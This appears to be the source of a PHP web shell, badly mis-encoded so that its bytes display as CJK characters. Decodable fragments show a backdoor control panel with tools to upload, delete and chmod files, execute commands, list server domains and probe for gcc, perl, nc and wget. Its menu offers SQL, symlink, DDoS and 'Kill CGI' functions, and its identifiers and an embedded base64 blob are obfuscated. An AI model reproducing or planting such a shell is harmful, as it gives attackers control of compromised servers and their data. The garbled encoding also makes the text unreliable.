㸼⽴搾ഊ†㰯瑲㸍ਠ‼瑲㸍ਠ†‼瑤㸼獰ㅮ㹐䡐㨼⽳瀱渾㰯瑤㸍ਠ†‼瑤㸧⹀灨灶㕲猴㉮⠩⸠✠†㱳瀱渾†⁓ㅦ㔠䴲搵㨧⸤猱昵彭㉤㕳⸧㰯獰ㅮ㸼⽴搾ഊ††㰯瑲㸍ਠ‼瑲㸍ਠ†‼瑤㸼獰ㅮ㹏㍲⁉债㰯獰ㅮ㸼⽴搾ഊ††㱴搾✮䀤当䕒噅剛≓䕒噅剟䅄䑒≝⸧††㱳瀱渾匵牶㕲⁉债㰯獰ㅮ㸠✮䀤当䕒噅剛≒䕍佔䕟䅄䑒≝⸧㰯瑤㸍ਠ‼⽴爾ഊ†㱴爾ഊ††㱴搾㱳瀱渾坅䉓㨼⽳瀱渾㰯瑤㸍ਠ†‼瑤⁷㑤瑨㴢㝥┢㸧㬍ਠ†‍ਠ†‴昨⑇䱏䉁䱓嬧獹猧崽㴧㍮㑸✩ഊ††笍ਠ†††․搰洱㑮猠㴠䁦㑬㔨∯㕴振渱洵搮挲湦∩㬍ਠ†††‴昨ℤ搰洱㑮猩ഊ††††笍ਠ†††††‵捨㈠≃䅎吠剅䅄⁮ㅭ㕤⹣㉮昢㬍ਠ†††⁽ഊ††††㕬猵ഊ††††笍ਠ††††․挲㍮琻†ഊ††††⁦㉲㔱捨⠤搰洱㑮猠ㅳ․搰洱㑮⤍ਠ††††笍ਠ††††‴昨䀵爵木≺㉮㔢Ⱔ搰洱㑮⤩ഊ†††††笍ਠ††††⁰爵束洱瑣桟ㅬ氨✣稲渵•⠮⨩∣✬․搰洱㑮Ⱐ⑤㉭ㄴ湳⤻ഊ†††††⁦氳獨⠩㬍ਠ††††‴昨獴牬㕮⡴爴洨⑤㉭ㄴ湳嬶嵛そ⤩‾⁡⥻ഊ††††⁦氳獨⠩㬍ਠ††††④㈳湴⬫㬍ਠ†††††素ഊ†††††⁽ഊ†††††⁽ഊ†††††‵捨㈠∤挲㍮琠⁄㉭ㄴ湳∻ഊ††††納ਠ†⁽ഊ††㕬猵笠㕣栲≃䅎吠剅䅄⁼圴湤㉷獼∻納ਠ†‍ਠ††‵捨㈠✼⽴搾ഊ††㰯瑲㸍ਠ†‼瑲㸍ਠ†‼瑤⁨㔴杨琽∶攢㸼獰ㅮ㹈䑄㨼⽳瀱渾㰯瑤㸍ਠ†‼瑤㸧⹭ㅤ匴稵⠤琲琱汓瀱挵⤮✠㱳瀱渾䙲㔵㨼⽳瀱渾✠⸠洱摓㑺㔨⑦爵㕓瀱挵⤠⸠✠嬧⸠⠴湴⤠⠤晲㔵印ㅣ㔯⑴㉴ㅬ印ㅣ㔪㘰〩‮‧╝㰯瑤㸍ਠ†‼⽴爾✻ഊ†ഊ††‴昨⑇䱏䉁䱓嬧獹猧崽㴧㍮㑸✠⤍੻ഊ††㑦⠡䀴渴彧㕴⠧猱昵彭㉤㔧⤩ഊ††笍ਠ†‍ਠ†‵捨㈠✼瑲㸼瑤⁨㔴杨琽∶㠢⁣㉬獰ㅮ㴢愢㸼獰ㅮ㹕猵昳氠㨠㰯獰ㅮ㸧㬍ਠ†․㍳㕲昳氠㴠ㅲ爱礨❧捣✬❬捣✬❣挧Ⱗ汤✬❭ㅫ㔧Ⱗ灨瀧Ⱗ瀵牬✬❰祴栲渧Ⱗ爳批✬❴ㅲ✬❧稴瀧Ⱗ扺㑰✬❢稴灡✬❮挧Ⱗ氲挱琵✬❳㌴摰㕲氧⤻ഊ††⁦㉲㔱捨⠤㍳㕲昳氠ㅳ․㑴㕭⤍ਠ††††㑦⡭ㅤ坨㑣栨␴琵洩⤍ਠ††††㕣栲․㑴㕭⸧Ⱗ㬍ਠ††††㕣栲‧㰯瑤㸍ਠ††††㰯瑲㸍ਠ††††‼瑲㸍ਠ††††‼瑤⁨㔴杨琽∰∠挲汳瀱渽≡∾㱳瀱渾䐲睮氲ㅤ㕲㨼⽳瀱渾✻ഊ††††‍ਠ††⑤㉷湬㈱搵牳‽‱牲ㅹ⠧睧㕴✬❦㕴捨✬❬祮砧Ⱗ水湫猧Ⱗ挳牬✬❧㕴✬❬睰⵭㑲爲爧⤻ഊ†††昲爵ㅣ栨⑤㉷湬㈱搵牳‱猠␴琵浡⤍ਠ†††㑦⡭ㅤ坨㑣栨␴琵浡⤩ഊ††††㕣栲․㑴㕭愮✬✻ഊ††††㕣栲‧㰯瑤㸍ਠ††††††‼⽴爾✻ഊ††††‍ਠ††††⁽ഊ†††††‵汳㔠ഊ†††††⁻ഊ††††‵捨㈠✼瑲㸼瑤⁨㔴杨琽∶㠢⁣㉬獰ㅮ㴢愢㸼獰ㅮ㸳猵昳氺㰯獰ㅮ㸧㬠ഊ††††‵捨㈠✭ⴭⴭⴭⴭⴭⴭⴼ⽴搾ഊ†††††‼⽴爾㱴搠栵㑧桴㴢〢⁣㉬獰ㅮ㴢愢㸼獰ㅮ㹄㉷湬㈱搵爺‼⽳瀱渾ⴭⴭⴭⴭⴭⴭⴼ⽴搾ഊ†††††††㰯瑲㸧㬠‍ਠ††††納੽ഊ㕬猵ഊ笍ਠ†㕣栲‧㱴爾㱴搠栵㑧桴㴢㘸∠挲汳瀱渽≡∾㱳瀱渾圴湤㉷㨼⽳瀱渾✻ഊ†‵捨㈠洱摅砨❶㕲✩㬍ਠ†㕣栲‧㰯瑤㸍ਠ††††㰯瑲㸠㱴爾ഊ††††㱴搠栵㑧桴㴢〢⁣㉬獰ㅮ㴢愢㸼獰ㅮ㹄㉷湬㈱搵爺‼⽳瀱渾ⴭⴭⴭⴭⴭⴭⴼ⽴搾ഊ†††††††㰯瑲㸧㬠ഊ††ഊ素‍ਠ†‍ਠഊ‵捨㈠✼瑲㸍ਠ†‼瑤⁨㔴杨琽∶攢⁣㉬獰ㅮ㴢愢㸼獰ㅮ㹄㑳ㅢ氵搠昳湣琴㉮猺㰯獰ㅮ㸧⸤搴獦㍮⸧㰯瑤㸍ਠ‼⽴爾ഊ†㱴爾ഊ††㱴搠栵㑧桴㴢㙥∠挲汳瀱渽≡∾㱳瀱渾捕剌㨧⸤挳牬⸧†䵹卑䰺✮⑭祳煬⸧†䵓卑䰺✮⑭獳煬⸧†倲獴杲㕓兌㨧⸤灧⸧†佲ㅣ氵㨠㰯獰ㅮ㸧⸤㉲⸧㰯瑤㸼瑤⁷㑤瑨㴢㙩┢㸧⹢ㅳ㕥畟搵挲搵⠢假䕧ㅈ䩬婪〴ㅈ到捄㉶䱯摯摹楴套剺捇㤰䱭楬摃䥧摇䙹婡嘰偓䩦奭硨扭猴偪硺捇䘳偪硭扡椰䥇乶扇㥹偓䥪䵅奷䥪畭扭䩺捄獭扭䩺捄獭扭䩺捄獭扭䩺捄獭扭䩺捄獭扭䩺捄瑎兕剔啅㥕䱫楆噄睶婭㤳摄甸䱯乷套甫偃㥨偧㴽∩⸧㰯瑤㸍ਠ‼⽴爾ഊ†㱴爾ഊ†㱴搠栵㑧桴㴢㘶∠挲汳瀱渽≯∾㱳瀱渾佰㕮形ㅳ㕤㑲㨧⸤㉰㕮形⸧⁓ㅦ㕟洲搵張砵损搴爺✮⑳ㅦ㕟㕸㔮✠†匱昵彭㉤㕟㑮捬㍤㕟搴爺✮⑳ㅦ㕟㑮捬㍤㔮✼⽴搾ഊ†㰯瑲㸍ਠ‼瑲㸍ਠ†‼瑤⁨㔴杨琽∶㘢㸼獰ㅮ㹓㕲瘵爠㰯獰ㅮ㸼⽴搾ഊ††㱴搠挲汳瀱渽≡∾✮䁧㕴㕮瘨❓䕒噅剟协䙔坁剅✩⸧㰯瑤㸍ਠ‼⽴爾✻ഊ†㑦⠤䝌佂䅌卛獹獝㴽≷㑮∩ഊ†笍ਠ†‵捨㈠✼瑲㸍ਠ†‼瑤⁨㔴杨琽∶愢㸼獰ㅮ㹄剉噅㨼⽳瀱渾㰯瑤㸍ਠ†‼瑤⁣㉬獰ㅮ㴢愢㸧⸤摲㑶㕳⸧㰯瑤㸍ਠ††㰯瑲㸧㬍ਠ⁽ഊ†ഊ†㕣栲‧㱴爾ഊ††㱴搠栵㑧桴㴢㙡∾㱳瀱渾偗䐺㰯獰ㅮ㸼⽴搾ഊ††㱴搠挲汳瀱渽≡∾✮④睤彬㑮歳⸧†㰱⁨爵昽⌠㉮捬㑣欽≧⡜❆㑬㕳䴱湜✬尧✠⸠⑇䱏䉁䱓嬧栲洵彣睤❝‮‧尧ⱜ❜✬尧尧ⱜ❜✩∾㱦㉮琠挲氲爽爵搠㹼䍕剒䕎呼㰯昲湴㸼⼱㸼⽴搾ഊ†㰯瑲㸍ਠ‼⽴ㅢ氵㸍਼⽤㑶㸍ਠ㱤㑶‴搽≭㔳湬㑳琢㸍ਠ††‼㍬㸍਼水㸼ㄠ桲㕦㴢⌢′湣水捫㴢木尧䘴氵獍ㅮ尧Ɱ㍬氬尧尧ⱜ❜✬尧尧⤢㹈位䔼⼱㸼⽬㐾ഊഊ㱬㐾㰱⁨爵昽∣∠㉮捬㑣欽≧⡜❰爲捜✬渳汬ⱜ❜✬尧尧ⱜ❜✩∾偒佃䕓匼⼱㸼⽬㐾ഊ㱬㐾㰱⁨爵昽∣∠㉮捬㑣欽≧⡜❰桰㕶ㅬ尧Ɱ㍬氬尧尧ⱜ❜✬尧尧⤢㹅噁䰼⼱㸼⽬㐾ഊ㱬㐾㰱⁨爵昽∣∠㉮捬㑣欽≧⡜❳煬尧Ɱ㍬氬尧尧ⱜ❜✬尧尧⤢㹓兌㰯ㄾ㰯水㸍਼水㸼ㄠ桲㕦㴢⌢′湣水捫㴢木尧栱獨尧Ɱ㍬氬尧尧ⱜ❜✬尧尧⤢㹈䅓䠼⼱㸼⽬㐾ഊ㱬㐾㰱⁨爵昽∣∠㉮捬㑣欽≧⡜❣㉮渵捴尧Ɱ㍬氬尧尧ⱜ❜✬尧尧⤢㹃低久䍔㰯ㄾ㰯水㸍਼水㸼ㄠ桲㕦㴢⌢′湣水捫㴢木尧稲渵桜✬渳汬ⱜ❜✬尧尧ⱜ❜✩∾婏久ⵈ㰯ㄾ㰯水㸍਼水㸼ㄠ桲㕦㴢⌢′湣水捫㴢木尧搲獜✬渳汬ⱜ❜✬尧尧ⱜ❜✩∾䑄体㰯ㄾ㰯水㸍਼水㸼ㄠ桲㕦㴢⌢′湣水捫㴢木尧猱昵尧Ɱ㍬氬尧尧ⱜ❜✬尧尧⤢㹓䅆䔠䵏䑅㰯ㄾ㰯水㸍਼水㸼ㄠ桲㕦㴢⌢′湣水捫㴢木尧獹浬㑮歜✬渳汬ⱜ❜✬尧尧ⱜ❜✩∾卙䵌䥎䬼⼱㸼⽬㐾ഊ㱬㐾㰱⁨爵昽∣∠㉮捬㑣欽≧⡜❳瀲瑜✬渳汬ⱜ❜✬尧尧ⱜ❜✩∾䵁䑓偏吼⼱㸼⽬㐾ഊ㱬㐾㰱⁨爵昽∣∠㉮捬㑣欽≧⡜❳㕬晲浜✬渳汬ⱜ❜✬尧尧ⱜ❜✩∾䭉汬⁃つ㔼⼱㸼⽬㐾ഊ㰯㍬㸍ਠ†‍ਠ†‼⽤㑶㸍ਧ㬠†ഊ††ഊ納਍੦㍮捴㐲渠洱摦㈲琵爨⤍੻ഊ††ഊ††㕣栲•㱴ㅢ氵⁣氱獳㴧昲㉴✠眴摴栽✶〰┧⁢㉲搵爽✰✠挵汬獰ㅣ㑮朽❯✠挵汬瀱摤㑮朽✰✠㸍ਠ†††㱴爾ഊ††††‼瑤⁷㑤瑨㴧㘷┧㸼昲牭′湳㍢洴琽尢木❆㑬㕳吲㉬猧Ɱ㍬氬瑨㑳⹦⹶ㅬ㌵Ⱗ浫昴氵✩㭲㕴㍲渠昱汳㔻尢㸼獰ㅮ㹟彍䬠䙉䱅彟㰯獰ㅮ㸼扲㸼㑮瀳琠捬ㅳ猽❤㑲✠⁴祰㔽琵硴⁮ㅭ㔽映瘱氳㔽✧㸼㑮瀳琠瑹瀵㵳㍢洴琠瘱氳㔽✾㸧㸼⽦㉲派㰯瑤㸍ਠ††††㱴搠眴摴栽❡㘥✾㱦㉲洠㉮猳扭㑴㵜≧⠧䘴氵獍ㅮ✬渳汬Ⱗ浫搴爧ⱴ栴献搮瘱氳㔩㭲㕴㍲渠昱汳㔻尢㸼獰ㅮ㹟彍䬠䑉剟弼⽳瀱渾㱢爾㰴湰㍴⁣氱獳㴧搴爧⁴祰㔽琵硴⁮ㅭ㔽搠瘱氳㔽✧㸼㑮瀳琠瑹瀵㵳㍢洴琠瘱氳㔽✾㸧㸼⽦㉲派㰯瑤㸍ਠ††††㱴搠眴摴栽❡愥✾㱦㉲洠㉮猳扭㑴㵜≧⠧䘴氵獍ㅮ✬渳汬Ⱗ搵氵琵✬瑨㑳⹤㕬⹶ㅬ㌵⤻爵琳牮⁦ㅬ猵㭜∾㱳瀱渾彟䑅䱅呅彟㰯獰ㅮ㸼扲㸼㑮瀳琠捬ㅳ猽❤㑲✠瑹瀵㵴㕸琠渱洵㵤㕬⁶ㅬ㌵㴧✾㰴湰㍴⁴祰㔽猳扭㑴⁶ㅬ㌵㴧㸾✾㰯昲牭㸼⽴搾ഊ††††‼瑤⁷㑤瑨㴧㘹┧㸼昲牭′湳㍢洴琽尢木❆㑬㕳吲㉬猧Ɱ㍬氬瑨㑳⹦⹶ㅬ㌵Ⱗ捨洲搧⤻爵琳牮⁦ㅬ猵㭜∾㱳瀱渾彟䍈䵏䑟弼⽳瀱渾㱢爾㰴湰㍴⁣氱獳㴧搴爧⁴祰㔽琵硴⁮ㅭ㔽映瘱氳㔽✧㸼㑮瀳琠瑹瀵㵳㍢洴琠瘱氳㔽✾㸧㸼⽦㉲派㰯瑤㸍ਠ†††㰯瑲㸍ਠ†††㱴爾ഊ††††‼瑤⁣㉬獰ㅮ㴧愧㸼昲牭′湳㍢洴琽❧⡮㍬氬瑨㑳⹣⹶ㅬ㌵ⱜ≜∩㭲㕴㍲渠昱汳㔻✾㱳瀱渾彟䍈䅎䝅⁄䥒彟㰯獰ㅮ㸼扲㸼㑮瀳琠捬ㅳ猽❦㈲瑴ㅢ氵✠瑹瀵㵴㕸琠渱洵㵣⁶ㅬ㌵㴧∮桴浬獰㕣㐱汣栱牳⠤䝌佂䅌卛❣睤❝⤮∧㸼㑮瀳琠瑹瀵㵳㍢洴琠瘱氳㔽✾㸧㸼⽦㉲派㰯瑤㸍ਠ††††㱴搠挲汳瀱渽❡✾㱦㉲洠洵瑨㉤㴧瀲獴✠㸼獰ㅮ㹟彈呔倠䑏坎䱏䅄彟㰯獰ㅮ㸼扲㸼㑮瀳琠捬ㅳ猽❦㈲瑴ㅢ氵✠瑹瀵㵴㕸琠渱洵㵲瑤㉷渠瘱氳㔽✧㸼㑮瀳琠瑹瀵㵳㍢洴琠瘱氳㔽✾㸧㸼⽦㉲派㰯瑤㸍ਠ†††‼⽴爾ഊ†††‼瑲㸍ਠ††††㱴搠挲汳瀱渽❵✾㱦㉲洠㉮猳扭㑴㵜≧⠧灲㉣✬渳汬ⱴ栴献挮瘱氳㔩㭲㕴㍲渠昱汳㔻尢㸼獰ㅮ㹟彅塅䍕呅彟㰯獰ㅮ㸼扲㸼㑮瀳琠捬ㅳ猽❦㈲瑴ㅢ氵✠瑹瀵㵴㕸琠渱洵㵣⁶ㅬ㌵㴧✾㰴湰㍴⁴祰㔽猳扭㑴⁶ㅬ㌵㴧㸾✾㰯昲牭㸼⽴搾ഊ††††㰯瑲㸍ਠ†††㱴爾ഊ††††‼瑤⁣㉬獰ㅮ㴧甧㸼昲牭⁭㕴栲搽❰㉳琧⁅乃呙偅㴧洳汴㑰ㅲ琯昲牭ⵤㅴㄧ㸍ਉ़㑮瀳琠瑹瀵㵨㑤搵渠渱洵㴱⁶ㅬ㌵㴧䘴氵獍䅮✾ഊउ㰴湰㍴⁴祰㔽栴摤㕮⁮ㅭ㔽挠瘱氳㔽✢‮․䝌佂䅌卛❣睤❝‮∧㸍ਉ़㑮瀳琠瑹瀵㵨㑤搵渠渱洵㵰㘠瘱氳㔽✳灬㈱摆㑬㔧㸍ਉ़㑮瀳琠瑹瀵㵨㑤搵渠渱洵㵣栱牳㕴⁶ㅬ㌵㴧∠⸠⠴獳㕴⠤彐体呛❣栱牳㕴❝⤿⑟偏協嬧捨ㅲ猵琧崺✧⤠⸠∧㸍ਠ†††‼獰ㅮ㹕灬㈱搠昴氵㨼⽳瀱渾㱢爾㰴湰㍴⁣氱獳㴧琲㉬獉湰✠瑹瀵㵦㑬㔠渱洵㵦㸼扲 㸼㑮瀳琠瑹瀵㵳㍢洴琠瘱氳㔽✾㸧㸼⽦㉲派㰯瑤㸍ਠ†††‼⽴爾‍ਠ††‼⽴ㅢ氵㸍ਠ‼⽤㑶㸍ਠ‼⽢㉤社ഊ㰯桴浬㸍ਢ㬍ਠ†‍੽ഊ㑦 Ⅶ㍮捴㐲湟㕸㑳瑳⠢瀲猴硟朵瑰眳㑤∩…☠⡳瑲瀲猨䀴渴彧㕴⠧搴猱扬㕟昳湣琴㉮猧⤬‧瀲猴硟朵瑰眳㑤✩㴽㵦ㅬ猵⤩⁻ഊ†⁦㍮捴㐲渠瀲猴硟朵瑰眳㑤⠤瀩⁻爵琳牮⁦ㅬ猵㭽⁽ഊ㑦 Ⅶ㍮捴㐲湟㕸㑳瑳⠢瀲猴硟朵瑧牧㑤∩…☠⡳瑲瀲猨䀴渴彧㕴⠧搴猱扬㕟昳湣琴㉮猧⤬‧瀲猴硟朵瑧牧㑤✩㴽㵦ㅬ猵⤩⁻ഊ†昳湣琴㉮⁰㉳㑸彧㕴杲朴搨⑰⤠筲㕴㍲渠昱汳㔻素納਍੦㍮捴㐲渠洱摗栴捨⠤瀩⁻ഊत瀱瑨‽⁭ㅤ䕸⠧睨㑣栠✠⸠⑰⤻ഊऴ昨ℵ浰瑹⠤瀱瑨⤩ഊउ爵琳牮․瀱瑨㬍ਉ爵琳牮⁦ㅬ猵㬍੽ഊഊഊഊ昳湣琴㉮⁭ㅤ匴稵⠤猩⁻ഊऴ昨⑳‾㴠㘰㝯㝵㘸慵⤍ਉॲ㕴㍲渠獰爴湴昨✥㘮慦✬․猠⼠㘰㝯㝵㘸慵 ⸠✠䝂✻ഊव汳㔴昨⑳‾㴠㘰甸椷攩ഊउ爵琳牮⁳灲㑮瑦⠧┶⹡昧Ⱐ⑳ ‶ふ㡩㝥 ‮‧⁍䈧㬍ਉ㕬猵㑦⠤猠㸽‶ち甩ഊउ爵琳牮⁳灲㑮瑦⠧┶⹡昧Ⱐ⑳ ‶ち甠⤠⸠✠䭂✻ഊव汳㔍ਉॲ㕴㍲渠⑳‮‧⁂✻ഊ納਍਍੦㍮捴㐲渠洱摐㕲浳⠤瀩⁻ഊऴ映⠨⑰…‰硃〰〩‽㴠へ䌰〰⤤㐠㴠❳✻ഊव汳㔴映⠨⑰…‰硁〰〩‽㴠へ䄰〰⤤㐠㴠❬✻ഊव汳㔴映⠨⑰…‰砸〰〩‽㴠へ㠰〰⤤㐠㴠✭✻ഊव汳㔴映⠨⑰…‰硥〰〩‽㴠へ攰〰⤤㐠㴠❢✻ഊव汳㔴映⠨⑰…‰硵〰〩‽㴠へ田〰⤤㐠㴠❤✻ഊव汳㔴映⠨⑰…‰硡〰〩‽㴠へ愰〰⤤㐠㴠❣✻ഊव汳㔴映⠨⑰…‰砶〰〩‽㴠へ㘰〰⤤㐠㴠❰✻ഊव汳㔠␴‽‧㌧㬍ਉ␴‮㴠⠨⑰…‰砰㘰〩‿‧爧›‧ⴧ⤻ഊत㐠⸽ ⠤瀠☠へ〰㠰⤠㼠❷✠㨠✭✩㬍ਉ␴‮㴠⠨⑰…‰砰ふ〩‿ ⠤瀠☠へ〸〰⤠㼠❳✠㨠❸✠⤠㨠⠨⑰…‰砰㠰〩‿‧匧›‧ⴧ⤩㬍ਉ␴‮㴠⠨⑰…‰砰ち〩‿‧爧›‧ⴧ⤻ഊत㐠⸽ ⠤瀠☠へ〰㘰⤠㼠❷✠㨠✭✩㬍ਉ␴‮㴠⠨⑰…‰砰〰㠩‿ ⠤瀠☠へふ〰⤠㼠❳✠㨠❸✠⤠㨠⠨⑰…‰砰田〩‿‧匧›‧ⴧ⤩㬍ਉ␴‮㴠⠨⑰…‰砰〰甩‿‧爧›‧ⴧ⤻ഊत㐠⸽ ⠤瀠☠へ〰ち⤠㼠❷✠㨠✭✩㬍ਉ␴‮㴠⠨⑰…‰砰〰㘩‿ ⠤瀠☠へち〰⤠㼠❴✠㨠❸✠⤠㨠⠨⑰…‰砰愰〩‿‧吧›‧ⴧ⤩㬍ਉ爵琳牮․㐻ഊ納੦㍮捴㐲渠洱摐㕲浳䌲氲爨⑦⤠笍ਉ㑦 ⅀㑳彲㔱搱扬㔨⑦⤩ഊउ爵琳牮‧㱦㉮琠挲氲爽⍆䘰〰〾✠⸠洱摐㕲浳⡀昴氵瀵牭猨⑦⤩‮‧㰯昲湴㸧㬍ਉ㕬猵㑦 ⅀㑳彷爴琱扬㔨⑦⤩ഊउ爵琳牮‧㱦㉮琠挲氲爽睨㑴㔾✠⸠洱摐㕲浳⡀昴氵瀵牭猨⑦⤩‮‧㰯昲湴㸧㬍ਉ㕬猵ഊउ爵琳牮‧㱦㉮琠挲氲爽⍡楦昰〾✠⸠洱摐㕲浳⡀昴氵瀵牭猨⑦⤩‮‧㰯昲湴㸧㬍੽ഊഊ㑦⠡昳湣琴㉮張破獴猨≳挱湤㑲∩⤠笍ਉ昳湣琴㉮⁳挱湤㑲⠤搴爩⁻ഊउ⑤栠‽′瀵湤㑲⠤搴爩㬍ਉॷ栴氵 昱汳㔠ℽ㴠⠤昴氵渱洵‽⁲㔱摤㑲⠤摨⤩⤍ਠ† त昴氵獛崠㴠⑦㑬㕮ㅭ㔻ഊउ爵琳牮․昴氵猻ഊॽഊ納਍਍੦㍮捴㐲渠洱摆㑬㕳䴱渨⤠笍ਉ洱摨㔱搨⤻ഊ††㕣栲‧㱤㑶⁣氱獳㵨㔱搵爾㱳捲㑰琾瀶弽灡弽灯弽∢㬼⽳捲㑰琾✻ഊऴ昨ℵ浰瑹⠤彐体呛❰㘧崩⤠笍ਉॳ眴瑣栨⑟偏協嬧瀶❝⤠笍ਉउ挱猵‧㍰氲ㅤ䘴氵✺ഊउउ㑦⠡䁭㉶㕟㍰氲ㅤ㕤彦㑬㔨⑟䙉䱅卛❦❝嬧瑭灟渱洵❝Ⱐ⑟䙉䱅卛❦❝嬧渱洵❝⤩ഊउउव捨㈠≃ㅮ❴″灬㈱搠昴氵™㬍ਉउॢ爵ㅫ㬍ਉउ挱猵‧浫搴爧㨍ਉउऴ昨⅀浫搴爨⑟偏協嬧灡❝⤩ഊउउव捨㈠≃ㅮ❴⁣爵ㅴ㔠渵眠搴爢㬍ਉउॢ爵ㅫ㬍ਉउ挱猵‧搵氵琵✺ഊउउ昳湣琴㉮⁤㕬㕴㕄㑲⠤瀱瑨⤠笍ਉउउ⑰ㅴ栠㴠⡳㍢獴爨⑰ㅴ栬ⴶ⤽㴧⼧⤠㼠⑰ㅴ栺⑰ㅴ栮✯✻ഊउउत摨†㴠㉰㕮搴爨⑰ㅴ栩㬍ਉउउ睨㑬㔠⠠⠤㑴㕭‽⁲㔱摤㑲⠤摨⤠⤠ℽ㴠昱汳㔩⁻ഊउउउ␴琵洠㴠⑰ㅴ栮␴琵活ഊउउउ㑦  戱猵渱洵⠤㑴㕭⤠㴽•⸮∩⁼簠⡢ㅳ㕮ㅭ㔨␴琵洩‽㴠∮∩ ഊउउउॣ㉮琴渳㔻ഊउउउ⑴祰㔠㴠昴氵瑹瀵⠤㑴㕭⤻ഊउउउ㑦 ⑴祰㔠㴽•搴爢⤍ਉउउउ搵氵琵䐴爨␴琵洩㬍ਉउउव汳㔍ਉउउउ䀳湬㑮欨␴琵洩㬍ਉउउ納ਉउउ捬㉳㕤㑲⠤摨⤻ഊउउी牭搴爨⑰ㅴ栩㬍ਉउॽഊउउ㑦⠴獟搴爨䀤彐体呛❰愧崩⤍ਉउ।㕬㕴㕄㑲⡀⑟偏協嬧灡❝⤻ഊउउ㕬猵ഊउउ䀳湬㑮欨䀤彐体呛❰愧崩㬍ਉउॢ爵ㅫ㬍ਉ।㕦ㄳ汴㨍ਠ†††††††‴昨ℵ浰瑹⠤彐体呛❰㘧崩⤠笍ਉउउ⑟卅卓䥏乛✱捴❝‽⁀⑟偏協嬧瀶❝㬍ਉउउ⑟卅卓䥏乛❦❝‽⁀⑟偏協嬧昧崻ഊउउ०㉲㔱捨⠤当䕓卉低嬧昧崠ㅳ․欠㴾․昩ഊउउउ⑟卅卓䥏乛❦❝嬤歝‽″牬搵挲搵⠤昩㬍ਉउउ⑟卅卓䥏乛❣❝‽⁀⑟偏協嬧挧崻ഊउउ納ਉउॢ爵ㅫ㬍ਉॽഊॽഊत搴牃㉮琵湴‽⁀獣ㅮ搴爨㑳猵琨⑟偏協嬧挧崩㼤彐体呛❣❝㨤䝌佂䅌卛❣睤❝⤻ഊऴ昨⑤㑲䌲湴㕮琠㴽㴠昱汳㔩⁻व捨㈠✼桯㸼獰ㅮ㹼†䅣挵獳⁄㕮㐵搡⁼㰯獰ㅮ㸼⽨漾㰯搴瘾✻洱摆㈲琵爨⤻⁲㕴㍲渻⁽ഊ१氲戱氠⑳㉲琻ഊत猲牴‽‱牲ㅹ⠧渱洵✬‶⤻ഊऴ昨ℵ浰瑹⠤彐体呛❰㘧崩⤠笍ਉऴ昨灲㕧彭ㅴ捨⠧ⅳ弨孁⵺崫⥟⡜摻㙽⤡✬․彐体呛❰㘧崬․洱瑣栩⤍ਉउ⑳㉲琠㴠ㅲ爱礨⑭ㅴ捨嬶崬 㑮琩⑭ㅴ捨孡崩㬍ਉ納ਵ捨㈠∍਼琱扬㔠眴摴栽✶〰┧⁣氱獳㴧洱㑮✠挵汬獰ㅣ㑮朽✰✠挵汬瀱摤㑮朽❡✠‾ഊ㱦㉲洠渱洵㵦㑬㕳⁭㕴栲搽瀲獴㸼瑲㸼瑨㹎ㅭ㔼⽴栾㱴栾匴稵㰯瑨㸼瑨㹍㉤㑦礼⽴栾㱴栾佷渵爯䝲㈳瀼⽴栾㱴栾倵牭㑳猴㉮猼⽴栾㱴栾䅣琴㉮猼⽴栾㰯瑲㸢㬍ਉ⑤㑲猠㴠⑦㑬㕳‽‱牲ㅹ⠩㬍ਉ⑮‽⁣㈳湴⠤搴牃㉮琵湴⤻ഊ०㉲⠤㐽〻␴㰤渻␴⬫⤠笍ਉत㉷‽⁀瀲猴硟朵瑰眳㑤⡀昴氵㉷渵爨⑤㑲䌲湴㕮瑛␴崩⤻ഊउ⑧爠㴠䁰㉳㑸彧㕴杲朴搨䁦㑬㕧爲㍰⠤搴牃㉮琵湴嬤㑝⤩㬍ਉत瑭瀠㴠ㅲ爱礨❮ㅭ㔧‽㸠⑤㑲䌲湴㕮瑛␴崬ഊउउठ❰ㅴ栧‽㸠⑇䱏䉁䱓嬧捷搧崮⑤㑲䌲湴㕮瑛␴崬ഊउउठ❭㉤㑦礧‽㸠䁤ㅴ㔨❙⵭ⵤ⁈㨴㩳✬⁀昴氵浴㑭㔨⑇䱏䉁䱓嬧捷搧崠⸠⑤㑲䌲湴㕮瑛␴崩⤬ഊउउठ❰㕲浳✠㴾⁭ㅤ倵牭獃㉬㉲⠤䝌佂䅌卛❣睤❝‮․搴牃㉮琵湴嬤㑝⤬ഊउउठ❳㑺㔧‽㸠䁦㑬㕳㑺㔨⑇䱏䉁䱓嬧捷搧崮⑤㑲䌲湴㕮瑛␴崩Ⰽਉउउ‧㉷渵爧‽㸠␲睛❮ㅭ㔧崿␲睛❮ㅭ㔧崺䁦㑬㔲睮㕲⠤搴牃㉮琵湴嬤㑝⤬ഊउउठ❧爲㍰✠㴾․杲嬧渱洵❝㼤杲嬧渱洵❝㩀昴氵杲㈳瀨⑤㑲䌲湴㕮瑛␴崩ഊउउऩ㬍ਉऴ昨䀴獟昴氵⠤䝌佂䅌卛❣睤❝‮․搴牃㉮琵湴嬤㑝⤩ഊउत昴氵獛崠㴠ㅲ爱祟洵牧㔨⑴浰Ⱐㅲ爱礨❴祰㔧‽㸠❦㑬㔧⤩㬍ਉव汳㔴昨䀴獟水湫⠤䝌佂䅌卛❣睤❝‮․搴牃㉮琵湴嬤㑝⤩ഊउत搴牳孝‽‱牲ㅹ彭㕲朵⠤瑭瀬‱牲ㅹ⠧瑹瀵✠㴾‧水湫✬‧水湫✠㴾⁲㔱摬㑮欨⑴浰嬧瀱瑨❝⤩⤻ഊउ㕬猵㑦⡀㑳彤㑲⠤䝌佂䅌卛❣睤❝‮․搴牃㉮琵湴嬤㑝⤦☠⠤搴牃㉮琵湴嬤㑝‡㴠∮∩⤍ਉउ⑤㑲獛崠㴠ㅲ爱祟洵牧㔨⑴浰Ⱐㅲ爱礨❴祰㔧‽㸠❤㑲✩⤻ഊॽഊत䝌佂䅌卛❳㉲琧崠㴠⑳㉲琻ഊ०㍮捴㐲渠睳㉃浰⠤ㄬ․戩⁻ഊउ㑦⠤䝌佂䅌卛❳㉲琧嵛そ‡㴠❳㑺㔧⤍ਉउ爵琳牮⁳瑲捭瀨獴牴㉬㉷㕲⠤ㅛ⑇䱏䉁䱓嬧猲牴❝嬰嵝⤬⁳瑲琲氲眵爨③嬤䝌佂䅌卛❳㉲琧嵛そ崩⤪⠤䝌佂䅌卛❳㉲琧嵛㙝㼶㨭㘩㬍ਉव汳㔍ਉउ爵琳牮 